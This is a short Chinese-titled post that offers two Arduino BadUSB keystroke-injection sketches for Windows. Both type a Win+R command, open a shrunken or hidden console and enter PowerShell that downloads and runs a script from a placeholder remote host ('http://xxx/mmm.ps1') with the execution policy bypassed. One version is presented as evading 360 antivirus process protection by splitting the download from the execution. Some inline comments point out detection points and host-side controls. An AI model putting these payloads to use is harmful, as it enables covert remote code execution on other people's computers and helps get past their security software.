badusb示例代码可绕过360

绕过360版本代码:

// Arduino HID keystroke-injection sketch ("BadUSB"). setup() runs once after the
// board is enumerated as a USB keyboard and types a fixed command sequence into
// whatever host it is plugged into. The host does not validate any of this — the
// board looks like an ordinary keyboard — so the effective controls are host-side:
// USB device control / HID allow-listing, PowerShell script block logging and
// Constrained Language Mode, and application control (WDAC/AppLocker).
void setup() {
  // Everything below is typed as keystrokes; nothing is executed on the board itself.
  Keyboard.begin(); // start emulating a USB HID keyboard
delay(3000); // give the host time to finish enumerating the device
Keyboard.press(KEY_LEFT_GUI); // hold the Windows key ...
delay(500);
Keyboard.press('r'); // ... and 'r': Win+R opens the Run dialog
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK); // author's note: Caps Lock is toggled on so the letters typed below are not intercepted by a Chinese IME; it is toggled back at the end
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\"");   // launches a console (/K keeps it open for the lines typed next); author's note says the 15x1 console size is meant to keep the window out of sight
// (a commented-out alternative launch line was here in the original; not used)
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(2000);
Keyboard.println("powershell");
Keyboard.println("$clnt = new-object System.Net.WebClient;");
Keyboard.println("$url= 'http://xxx/mmm.ps1';");  // placeholder: 'xxx' stands for a remote host, 'mmm.ps1' for the script it serves; the outbound fetch of a .ps1 is a detection point (proxy/DNS logs, WebClient use in script block logs)
Keyboard.println("$file = ' D:\\mmm.ps1';");      // local path the script is written to
Keyboard.println("$clnt.DownloadFile($url,$file)");  // author's note claims splitting download and execution into separate statements avoids a process-protection trigger — unverified
Keyboard.println("PowerShell.exe -ExecutionPolicy Bypass -File d:\\mmm.ps1"); // runs the downloaded script; -ExecutionPolicy is not a security boundary, it only suppresses the policy check — AMSI, script block logging, CLM and app control still apply
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); // restore Caps Lock state
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end(); // stop emulating the keyboard
}

// Nothing to do after setup(): the keystroke sequence is sent only once.
void loop() {
  // intentionally empty

}

简单使用版本代码:(360进程防护会阻拦)


// Same keystroke sequence as setup() above, shown as bare statements. It differs
// in opening a plain console and in fetching and running the remote script with
// one download-and-execute PowerShell line instead of writing it to disk first.
// The same host-side controls apply: USB device control, PowerShell logging,
// Constrained Language Mode and application control.
Keyboard.begin(); // start emulating a USB HID keyboard
delay(5000); // give the host time to finish enumerating the device
Keyboard.press(KEY_LEFT_GUI); // hold the Windows key ...
delay(500);
Keyboard.press('r'); // ... and 'r': Win+R opens the Run dialog
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK); // author's note: Caps Lock is toggled on so the letters typed below are not intercepted by a Chinese IME; it is toggled back at the end
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD");
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(2000);
Keyboard.println("powershell -windowstyle hidden -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://xxx/mmm.ps1');mmm.ps1");  // placeholder host/script as above; author's note says IEX runs the fetched text in memory rather than from a file, yet `mmm.ps1` is still typed as a second command. The hidden window and -exec bypass are typical of this pattern; the command line itself is visible to process-creation auditing and script block logging
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); // restore Caps Lock state
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end(); // stop emulating the keyboard

 
